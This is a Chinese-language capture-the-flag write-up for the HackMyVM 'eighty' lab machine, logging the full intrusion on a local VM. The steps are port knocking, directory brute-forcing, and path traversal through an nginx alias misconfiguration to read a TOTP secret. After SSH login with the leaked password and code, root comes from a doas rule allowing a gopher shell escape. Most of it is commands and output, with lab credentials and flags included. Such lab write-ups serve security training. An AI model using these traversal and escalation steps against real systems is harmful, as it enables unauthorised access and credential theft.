tags:
- HMV
- gopher
- doas另类sudo提权
- knock
- 目录穿越
Type: wp
dg-publish: true
难度: ⭐️⭐️⭐️
作者: sml
系统: Linux
这里写目录标题
- 2. 信息收集
- 2.1. 端口扫描
- 2.2. knock敲门
- 2.3. 目录扫描
- 2.4. 目录穿越
- 3. 提权
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# nmap -sVC 192.168.56.8 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 22:33 EST
Nmap scan report for 192.168.56.8
Host is up (0.000055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)
| 256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)
|_ 256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)
70/tcp open http pygopherd web-gopher gateway
|_http-title: Gopher
| gopher-ls:
|_[txt] /howtoconnect.txt "Connection"
80/tcp filtered http
MAC Address: 08:00:27:8C:94:BE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds
80端口被防火墙过滤了
70端口有一个 gopher
服务 里面有一个 howtoconnect.txt
┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8:70/howtoconnect.txt
Ping us to: 4767 2343 3142
这应该就是提示我们依次敲门打开80端口了
2.2. knock敲门
┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# knock 192.168.56.8 4767 2343 3142 -v
hitting tcp 192.168.56.8:4767
hitting tcp 192.168.56.8:2343
hitting tcp 192.168.56.8:3142┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# nmap 192.168.56.8 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 22:37 EST
Nmap scan report for 192.168.56.8
Host is up (0.00044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
70/tcp open gopher
80/tcp open http
MAC Address: 08:00:27:8C:94:BE (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8
Hi.
<!-- 80 -->
这时候发现80端口就开放了
2.3. 目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# dirsearch -u http://192.168.56.8
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/Desktop/hmv/eighty/reports/http_192.168.56.8/_24-12-19_22-38-36.txtTarget: http://192.168.56.8/[22:38:36] Starting:
[22:38:51] 200 - 18B - /robots.txtTask Completed
里面有一个 /robots.txt
┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8/robots.txt
/nginx_backup.txt┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8/nginx_backup.txt
server {listen 80 default_server;listen [::]:80 default_server;root /var/www/html;index index.html index.htm index.nginx-debian.html;server_name _;location / {try_files $uri $uri/ =404;}
}server {
server_name henry.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;location /web {alias /home/henry/web/;}}server {
server_name susan.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;location /web {alias /home/susan/web/;}}
可以获取到一个nginx的配置文件
里面发现了两个域名 henry.eighty.hmv
susan.eighty.hmv
还有这两个用户 henry
susan
配置到hosts
这里还可以获取到两个路径
henry.eighty.hmv/web/
susan.eighty.hmv/web/
对这两个路径都进行目录爆破
在susan的目录下可以获取到一个文件
┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# gobuster dir -u susan.eighty.hmv/web/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,zip,jpg,png,txt,rar
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://susan.eighty.hmv/web/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,png,txt,rar,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 40]
/lostpasswd.txt (Status: 200) [Size: 50]
Progress: 1661144 / 1661152 (100.00%)
===============================================================
Finished
===============================================================┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl http://susan.eighty.hmv/web/lostpasswd.txt
8ycrois-tu0 + /home/susan/secret/.google-auth.txt
2.4. 目录穿越
这里告诉了我们一个路径 /home/susan/secret/.google-auth.txt
我们可以利用目录穿越读取度这个文件
因为
location /web
写的不规范 正确应该是location /web/
┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl http://susan.eighty.hmv/web../secret/.google-auth.txt
2GN7KARBONVR55R7SP3UZPN3ZM
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
71293338
48409754
27074208
60216448
17908010
这是一段 TOTP(基于时间的一次性密码,Time-Based One-Time Password) 配置文件,通常用于双因素身份验证(2FA)的种子和相关参数
2GN7KARBONVR55R7SP3UZPN3ZM
是 TOTP 的密钥种子(Secret Key),通常是一个 Base32 编码的字符串。它用于生成时间敏感的一次性密码
简单来说就是还要输入一次验证码 。这里验证码选择下面任意一个即可
利用密码 8ycrois-tu0
和验证码登录上去
┌──(root㉿kali)-[~]
└─# ssh susan@192.168.112.23
(susan@192.168.112.23) Password:
(susan@192.168.112.23) Verification code:
Linux eighty 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 7 07:05:11 2021
susan@eighty:~$susan@eighty:~$ sh flag.sh. *** *.,**,, ,*., *,/ *,* *,/. .*.* **,* ,*** *.** **.,* ***, ,** ***, .**. **** ,*,** *,
-------------------------PWNED HOST: eightyPWNED DATE: Thu 19 Dec 2024 11:48:18 PM ESTWHOAMI: uid=1000(susan) gid=1000(susan) groups=1000(susan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)FLAG: hmv8use0red------------------------
3. 提权
susan@eighty:~$ find / -perm -4000 2>/dev/null
/usr/local/bin/doas
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount
这里发现了一个 doas
https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation#doas
有一些替代
sudo
二进制文件的选项,例如 OpenBSD 的doas
,请记得检查其配置文件/etc/doas.conf
。
permit nopass demo as root cmd vim
susan@eighty:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
susan@eighty:~$ cat /usr/local/etc/doas.conf
permit nolog susan as root cmd gopher
可以发现允许我们使用 root
权限执行 gopher
doas -u root gopher
输密码 然后输入!Spawning your default shell. Type 'exit' to return to Gopher.root@eighty:/home/susan# id
uid=0(root) gid=0(root) groups=0(root)
root@eighty:/home/susan# whoami
root
root@eighty:/home/susan#
root@eighty:~# sh fl4g.sh. *** *.,**,, ,*., *,/ *,* *,/. .*.* **,* ,*** *.** **.,* ***, ,** ***, .**. **** ,*,** *,
-------------------------PWNED HOST: eightyPWNED DATE: Fri Dec 20 00:01:53 EST 2024WHOAMI: uid=0(root) gid=0(root) groups=0(root)FLAG: rooted80shmv------------------------